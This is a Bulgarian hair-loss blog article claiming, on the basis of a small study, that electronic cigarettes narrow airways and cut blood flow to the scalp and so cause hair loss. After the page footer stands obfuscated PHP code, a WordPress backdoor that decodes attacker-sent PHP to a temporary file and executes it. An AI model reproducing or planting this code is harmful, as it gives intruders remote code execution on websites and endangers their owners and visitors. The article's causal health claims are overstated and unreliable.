Електронните цигари също предизвикват косопад | Косопад

Електронните цигари също водят до косопад

Модерните технологии съвсем не са безопасни и също предизвикват косопад

Последните проучвания за въздействието върху тялото на уж безопасните електронни цигари изправиха на нокти научните среди в САЩ. След проведено сравнително малко проучване стана ясно, че алтернативата на истинските цигари е много по – вредна, отколкото се предполагаше до момента и наред с всички други проблеми, може да предизвика и косопад.

На първо място електронните цигари водят до мълниеносни промени в белодробната дейност и дихателните пътища. Учените установиха, че само пет минути пушене от пластмасовия заместител са достатъчни, за предизвикване на сериозно разстройство в белодробните функции на иначе напълно здрави пушачи, доста по – голямо намаляване на оросяването на главата, което пък от своя страна е сериозна предпоставка за поява на косопад.

Понеже проучванията по тази тема са още в самото начало, не е установено откъде точно възникват проблемите. Специалистите предполагат, че инхалирането на течния никотин вместо истинския цигарен дим влияе много силно и това вреди на безопасността.

Само след пет минути пушене от електронна цигара, кръвните и белодробните пътища отбелязали значително стеснение. Това било доказано чрез серия от тестове и поява на възпаление у някои от пациентите. Излишно е да обясняваме, че липсата на достатъчно кръв и кислород е една от основните причини за косопад в света.

Тепърва ще се изяснява дали тези прояви оказват дългосрочни поражения върху тялото и до каква степен може да са отговорни за поява на косопад.

косопад и електронни цигари

Косопад и електронни цигари

08. май 2013 19:51:17 от Косопад
Категории: Косопад – Статии | Етикети: , , | 2 коментари

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}